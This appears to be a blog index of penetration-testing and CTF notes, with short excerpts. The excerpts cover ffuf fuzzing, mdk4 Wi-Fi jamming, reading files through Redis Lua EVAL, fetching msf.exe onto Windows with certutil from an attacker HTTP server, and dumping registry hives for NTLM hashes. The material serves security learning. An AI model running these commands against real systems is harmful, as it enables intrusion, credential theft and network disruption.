Gajendra Mahato

FFUF - Fuzz Faster U Fool

1. Directory and File Brute Forcing Basic Directory Fuzzing: ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ/ Fuzz common directory names (e.g., /admin/, /uploads/). 2. Fuzzing Parameters Basic Parameter Fuzzing: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ Replaces FUZZ with words from the wordlist to test URL parameters. Filter by Status Code: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -mc 200 Shows responses only for the 200 OK status code. Filter by Content Size: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -fs 150 Filters results based on exact response size in bytes. Fuzzing with JSON Payload (for APIs): ...

January 13, 2026 · 3 min

IDA Debugger Key Notes (Default)

Execution control F7 runs step into so it enters the next function F8 runs step over so it goes to the next instruction without entering the function F9 runs continue process until a breakpoint or crash Ctrl + F2 stops the debugger Ctrl + F9 restarts the process Breakpoints F2 toggles a breakpoint on the current line Shift + F2 deletes all breakpoints Alt + B opens the breakpoint list Navigation during debug EIP/RIP highlighted shows the current instruction Space switches between graph view and linear view G jumps to an address Esc goes back Registers and memory Alt + R opens the registers window Alt + M opens the memory window Alt + S opens the stack view Ctrl + Alt + R refreshes registers Practical CTF flow Press F9 to run the program Hit F2 on main or the check function Use F8 to trace logic Use F7 only when entering a crypto or check routine Watch registers and stack Laptop Friendly Tip If F keys are painful then remap: ...

January 13, 2026 · 1 min

Jamming Wi-Fi with `mdk4`

With the mdk4 tool, you can jam Wi-Fi networks in various ways. This guide will walk you through the installation, setup, and usage of mdk4, including examples for different attacks. 1. Installation If mdk4 is not installed on your system, install it using the following command: sudo apt-get install mdk4 -y Switching to Root User If you are not the root user, switch to root: sudo su Example: kali@gajendra:~$ sudo su 2. Checking Network Interface Status Check your network interface status to see if it’s in monitor mode: ...

January 13, 2026 · 4 min

Reading a File in Redis-CLI Interactive Shell

Redis allows the execution of Lua scripts through the EVAL command. If Redis is misconfigured or exposed to attackers, the Lua scripting engine can be used to execute arbitrary commands, including reading files on the system. File Read via EVAL Command You can read the contents of a file (e.g., /flag.txt) using the EVAL command in the Redis interactive shell: EVAL "return io.popen('cat /flag.txt'):read('*a')" 0

January 13, 2026 · 1 min

Reverse Engineering notes with GDB (pwndbg)

This guide walks through analyzing a basic binary (e.g., crackme) using pwndbg. 1. Initial Reconnaissance Start gdb with the binary: $ gdb ./crackme List Functions To see all defined functions in the binary (useful to find main or custom functions): pwndbg> info functions Output Analysis: Look for main. Ignore standard library functions like puts@plt, __isoc99_scanf@plt, _start, etc., unless necessary. Tip: You can filter with a regex: info functions main or info functions ^my_. 2. Static Analysis (Disassembly) Once you identify interesting functions (like main), disassemble them to see the instructions. ...

January 13, 2026 · 4 min

Scanning `rpcbind` on the Network

To scan for rpcbind on a network and check NFS shares, use the following command: sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP # Scan port 111 for rpcbind and list NFS shares Listing Mounted Partitions on the Network To list the exported partitions of a network system, use: showmount -e $IP # List the exported directories on the NFS server Mounting rpcbind Directories on Local Machine To mount a remote NFS directory on the local machine. In this example, the directory /var is mounted from the remote server with IP 10.10.122.178. ...

January 13, 2026 · 2 min

To extract a hash from a private.asc file

To see the available keys on your system: $ gpg --list-secret-keys If you have a backup.gpg file in encrypted format, you need a key to decode it. If you find the key in some file, simply import that file into your system: $ gpg --import private.asc If the private.asc file is itself encrypted, gpg asks for a password to decrypt it before importing it into your system. We can also crack the private.asc key by extracting a hash from it with john ...

January 13, 2026 · 1 min

Tutorial: Downloading Files from Linux to Windows Using Windows CLI

Method 1: Using an HTTP Server Step 1: Start an HTTP server on Linux Open a terminal on your Linux machine and run: sudo python3 -m http.server 80 Step 2: Download the file using certutil on Windows Open Command Prompt or PowerShell on your Windows machine and run: certutil.exe -urlcache -split -f "http://10.10.14.7/msf.exe" Method 2: Using Invoke-WebRequest Step 1: Start an HTTP server on Linux Same as Step 1 in Method 1. Step 2: Download the file using Invoke-WebRequest on Windows Open PowerShell on your Windows machine and run: ...

January 13, 2026 · 2 min

Tutorial: String Manipulation in Perl with s///, y///, and s///g

Perl provides powerful operators for manipulating strings using regular expressions. Here’s a breakdown of each operator with examples: s/// (Substitution Operator) Syntax: s/old-pattern/new-pattern/ Purpose: Replaces occurrences of old-pattern with new-pattern in a string. Example: s/John/Doe/ replaces the first instance of “John” with “Doe”. Example 1: Replace “John” with “Doe” $text = "Hello John. John is a friend."; $text =~ s/John/Doe/; # Result: "Hello Doe. John is a friend." Example 2: Replace “white” with “black” ...

January 13, 2026 · 3 min

🗃️ Dumping NTLM Hashes via Non-Interactive Shell (Windows)

Step 1: 💾 Save Registry Hives (SAM, SECURITY, SYSTEM) Run these commands on the target Windows machine: reg.exe save hklm\sam sam reg.exe save hklm\security security reg.exe save hklm\system system These commands save the SAM, SECURITY, and SYSTEM hives as files in the current directory. 📂 Copy these files to your attacker machine for offline cracking. 🔍 Step 2: Extract Hashes from Saved Files Two popular tools to extract NTLM hashes: Using samdump2: samdump2 ./system ./sam Using Impacket’s secretsdump.py: secretsdump.py -sam sam -system system LOCAL 📄 Sample Output Explained Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450::: 👤 Username (e.g., Administrator) 🆔 User RID/Group (e.g., 500) 🔐 LM hash (usually empty/disabled) 🗝️ NT hash (this is what you crack) 🛠️ Step 3: Crack NTLM Hashes Extract NT hashes (4th field) and save in hashes.txt: ...

January 13, 2026 · 1 min